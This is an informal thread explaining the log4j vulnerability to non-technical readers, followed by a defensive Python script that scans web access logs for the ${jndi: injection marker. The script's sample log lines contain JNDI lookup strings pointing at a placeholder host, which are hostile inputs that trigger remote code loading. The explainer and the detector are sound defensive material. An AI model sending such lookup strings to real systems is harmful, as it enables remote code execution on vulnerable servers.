Explaining #log4j for non-technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there
Log4j is a popular logging library used in the Java programming language.
A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (Firefox, Chrome, Edge...), when you made the request, what page you accessed... and more!
So, this log4j library is used in A LOT of Java software, and there are approximately 3 billion devices that run Java. Quick math: that's huge.
Log4j is present in web servers, your phones, possibly on your smart fridge and plenty of other places...
A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything.
One of the things it does is look for patterns like ${something} and try to replace them with another piece of information.
It is used to add context, for example ${date} would be replaced by today's date.
(I have no idea if this example works, it's just to keep it simple)
So when there's a ${jndi: pattern, it will try to replace it.
Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet; we just have to tell it where to get the data from.
This data can be malicious software.
Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j.
Which means that at this point hackers can make the targeted computer do (almost) whatever they want.
This gets really bad because we don't need to know which computer to target.
Remember when I said web servers log what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing.
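For the more technical readers, here is the defender's side of that last point, as an added example that is not part of the original thread: a short Python script that searches web server access log lines for the `${jndi:` marker in the fields a visitor controls. The Apache-style "combined" log format, the sample lines and the function name `find_jndi_markers` are assumptions made for this illustration.

```python
import re

# Apache-style "combined" access log line (assumed format for this example).
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)
# The marker from the thread plus the scheme that follows it (ldap, ...).
# Matched without regard to letter case.
JNDI = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"
198.51.100.23 - - [10/Dec/2021:09:14:05 +0000] "GET /login HTTP/1.1" 200 734 "-" "${jndi:ldap://host.invalid/a}"
198.51.100.23 - - [10/Dec/2021:09:14:06 +0000] "GET /?q=${jndi:ldap://host.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79.1"
this line is not in the expected format
"""

def find_jndi_markers(log_text):
    """Return one finding per visitor-controlled field containing the marker."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        parsed = LOG_LINE.match(line)
        if parsed:
            ip = parsed.group("ip")
            fields = {name: parsed.group(name)
                      for name in ("request", "referer", "user_agent")}
        else:
            # Unexpected format: search the whole line instead of skipping it.
            ip, fields = None, {"raw": line}
        for name, value in fields.items():
            hit = JNDI.search(value)
            if hit:
                findings.append({"line": lineno, "ip": ip, "field": name,
                                 "scheme": hit.group("scheme").lower()})
    return findings

if __name__ == "__main__":
    for f in find_jndi_markers(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} sent the marker in "
              f"{f['field']} (scheme: {f['scheme']})")
```

A hit only shows that someone sent the pattern; whether the software behind the log actually uses log4j has to be checked separately.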